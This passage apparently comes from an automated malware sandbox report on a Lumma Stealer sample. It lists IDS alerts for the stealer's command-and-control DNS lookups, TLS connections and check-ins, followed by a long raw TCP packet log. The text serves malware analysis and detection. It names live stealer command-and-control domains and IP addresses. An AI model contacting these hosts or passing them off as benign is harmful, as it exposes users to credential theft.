                                                                                                                                                                                                                                                                  2024-12-14T14:16:27.357655+01002058223ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)1192.168.2.649752104.21.22.222443TCP
                                                                                                                                                                                                                                                                  2024-12-14T14:16:27.357655+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649752104.21.22.222443TCP
                                                                                                                                                                                                                                                                  2024-12-14T14:16:28.405476+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649752104.21.22.222443TCP
                                                                                                                                                                                                                                                                  2024-12-14T14:16:28.405476+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649752104.21.22.222443TCP
                                                                                                                                                                                                                                                                  2024-12-14T14:16:28.412659+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.6544611.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-14T14:16:29.854582+01002058215ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)1192.168.2.649759104.21.96.1443TCP
                                                                                                                                                                                                                                                                  2024-12-14T14:16:29.854582+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649759104.21.96.1443TCP
                                                                                                                                                                                                                                                                  2024-12-14T14:16:30.731798+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649759104.21.96.1443TCP
                                                                                                                                                                                                                                                                  2024-12-14T14:16:30.731798+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649759104.21.96.1443TCP
                                                                                                                                                                                                                                                                  2024-12-14T14:16:30.739913+01002058220ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)1192.168.2.6494931.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-14T14:16:30.999936+01002058218ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)1192.168.2.6564281.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-14T14:16:31.222907+01002058216ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)1192.168.2.6512881.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-14T14:16:31.448194+01002058236ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)1192.168.2.6645551.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-14T14:16:31.670893+01002058210ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)1192.168.2.6622141.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-14T14:16:31.897603+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.6527961.1.1.153UDP
                                                                                                                                                                                                                                                                  2024-12-14T14:16:33.573527+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64976823.55.153.106443TCP
                                                                                                                                                                                                                                                                  2024-12-14T14:16:34.423166+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.64976823.55.153.106443TCP

                                                                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:16.973021030 CET49722443192.168.2.6104.21.56.70
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:16.973089933 CET44349722104.21.56.70192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:16.973167896 CET49722443192.168.2.6104.21.56.70
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:17.024014950 CET49722443192.168.2.6104.21.56.70
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:17.024075031 CET44349722104.21.56.70192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:18.243246078 CET44349722104.21.56.70192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:18.243319035 CET49722443192.168.2.6104.21.56.70
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:18.363826036 CET49722443192.168.2.6104.21.56.70
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:18.363853931 CET44349722104.21.56.70192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:18.364262104 CET44349722104.21.56.70192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:18.364345074 CET49722443192.168.2.6104.21.56.70
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:18.385513067 CET49722443192.168.2.6104.21.56.70
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:18.431328058 CET44349722104.21.56.70192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:18.900408030 CET44349722104.21.56.70192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:18.900635958 CET44349722104.21.56.70192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:18.900768995 CET49722443192.168.2.6104.21.56.70
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:18.958976984 CET49722443192.168.2.6104.21.56.70
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:18.959017038 CET44349722104.21.56.70192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:18.959049940 CET49722443192.168.2.6104.21.56.70
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:18.959145069 CET49722443192.168.2.6104.21.56.70
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:19.199212074 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:19.319329023 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:19.319457054 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:19.343600988 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:19.463454962 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.657592058 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.657635927 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.657689095 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.657778025 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658616066 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658662081 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658674955 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658777952 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658777952 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658818960 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658829927 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658842087 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658854961 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658885956 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658915043 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658963919 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.659070969 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.777564049 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.777631998 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.777646065 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.777854919 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.781755924 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.781975985 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.850800991 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.850902081 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.851067066 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.854913950 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.855000973 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.855045080 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.855096102 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.863306999 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.863399029 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.866380930 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.866477966 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.866483927 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.866708040 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.874794006 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.874900103 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.874923944 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.875248909 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.883375883 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.883394003 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.883454084 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.883454084 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.891619921 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.891695023 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.891700029 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.891765118 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.899988890 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.900038958 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.900067091 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.900151014 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.908457041 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.908518076 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.908534050 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.908744097 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.916827917 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.916898012 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.916922092 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.916955948 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.924452066 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.924561024 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.924587965 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.924638033 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.932105064 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.932164907 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.042948961 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.043030024 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.043059111 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.043164015 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.045382023 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.045504093 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.046248913 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.046312094 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.046468973 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.051137924 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.051213026 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.051245928 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.051348925 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.056138992 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.056154966 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.056204081 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.056257010 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.060811996 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.060858965 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.060909986 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.065596104 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.065608978 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.065691948 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.065691948 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.070324898 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.070476055 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.070570946 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.075144053 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.075232029 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.075320005 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.079807997 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.079950094 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.079952955 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.080128908 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.084543943 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.084671974 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.084687948 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.084736109 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.089371920 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.089417934 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.089518070 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.089518070 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.094050884 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.094152927 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.094157934 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.094269991 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.098886013 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.098952055 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.098959923 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.099209070 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.104197025 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.104238033 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.104248047 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.104306936 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.108541012 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.108686924 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.108709097 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.108757019 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.113409042 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.113487005 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.113502979 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.113719940 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.117865086 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.117960930 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.117965937 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.118083954 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.122611046 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.122699976 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.122737885 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.122808933 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.235038996 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.235064983 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.235222101 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.235222101 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.236982107 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.237112999 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.237143040 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.237258911 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.240838051 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.240927935 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.242203951 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.242276907 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.242341042 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.242489100 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.246078014 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.246139050 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.246170998 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.246277094 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.249886036 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.250015020 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.250072956 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.250406981 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.253634930 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.253712893 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.253752947 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.253791094 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.257304907 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.257370949 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.257400036 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.257441998 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.260917902 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.261022091 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.261043072 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.261085987 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.264516115 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.264585018 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.264591932 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.264731884 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.268069029 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.268173933 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.268227100 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.268227100 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.271712065 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.271855116 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.271855116 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.272075891 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.275321007 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.275403976 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.275429964 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.275527000 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.278995037 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.279010057 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.279090881 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.282520056 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.282614946 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.282624960 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.282671928 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.286111116 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.286165953 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.286225080 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.286330938 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.289735079 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.289896011 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.289921045 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.289952993 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.293325901 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.293406010 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.293435097 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.293690920 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.296958923 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.297044992 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.297050953 CET8049726176.113.115.19192.168.2.6
